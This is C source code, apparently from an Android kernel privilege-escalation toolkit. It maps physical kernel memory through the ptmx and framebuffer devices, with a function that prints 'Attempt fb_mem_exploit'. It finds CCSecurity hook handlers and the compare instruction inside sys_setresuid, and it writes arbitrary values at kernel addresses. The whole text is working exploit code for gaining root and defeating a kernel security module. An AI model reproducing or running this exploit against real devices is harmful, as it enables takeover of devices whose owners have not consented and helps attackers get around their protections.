bool
map_kernel_memory(void)
{
if (!kernel_physical_offset) {
if (!setup_variables()) {
return false;
}
}
fb_mmap_fd = -1;
kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS;
if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) {
return true;
}
fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000);
printf("Attempt fb_mem_exploit...\n");
fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd);
if (fb_mem_mmap_base) {
kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base);
return true;
}
fb_mmap_fd = -1;
return false;
}
static void*
find_ccs_search_binary_handler_address_in_ccsecurity_ops(void *mmap_base_address)
{
unsigned long int ccsecurity_ops = 0;
unsigned long int *ccs_search_binary_handlers;
int i = 0;
void *mapped_ccsecurity_ops;
void *found_address = NULL;
ccsecurity_ops = kallsyms_in_memory_lookup_name("ccsecurity_ops");
if (!ccsecurity_ops) {
return NULL;
}
ccs_search_binary_handlers = kallsyms_in_memory_lookup_names("__ccs_search_binary_handler");
if (!ccs_search_binary_handlers) {
return NULL;
}
mapped_ccsecurity_ops = fb_mem_convert_to_mmaped_address((void*)ccsecurity_ops, mmap_base_address);
while (ccs_search_binary_handlers[i]) {
found_address = memmem(mapped_ccsecurity_ops, 0x100, &ccs_search_binary_handlers[i], sizeof(ccs_search_binary_handlers[i]));
if (found_address) {
break;
}
i++;
}
free(ccs_search_binary_handlers);
return found_address;
}
static bool
attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
unsigned long int offset;
int fd;
void *address;
bool result;
offset = get_kernel_physical_offset();
if (offset) {
fb_mem_set_kernel_phys_offset(offset - 0x00008000);
}
address = fb_mem_mmap(&fd);
if (address == MAP_FAILED) {
return false;
}
result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address),
KERNEL_SIZE,
callback_param);
fb_mem_munmap(address, fd);
return result;
}
static void*
find_cmp_operation_address_in_sys_setresuid(void *mmap_base_address)
{
void *mapped_sys_setresuid_address;
unsigned long int sys_setresuid_address = 0;
sys_setresuid_address = get_sys_setresuid_address_in_memory(mmap_base_address);
if (!sys_setresuid_address) {
printf("Failed to get sys_setresuid address due to %s\n", strerror(errno));
return NULL;
}
mapped_sys_setresuid_address = fb_mem_convert_to_mmaped_address((void*)sys_setresuid_address, mmap_base_address);
return memmem(mapped_sys_setresuid_address, 0x100, &cmp_operation_code, sizeof(cmp_operation_code));
}
bool
fb_mem_write_value_at_address(unsigned long int address, int value)
{
void *mmap_address = NULL;
int *write_address;
int fd;
mmap_address = fb_mem_mmap(&fd);
if (mmap_address == MAP_FAILED) {
return false;
}
write_address = (int*)fb_mem_convert_to_mmaped_address((void*)address, mmap_address);
*write_address = value;
fb_mem_munmap(mmap_address, fd);
return true;
}
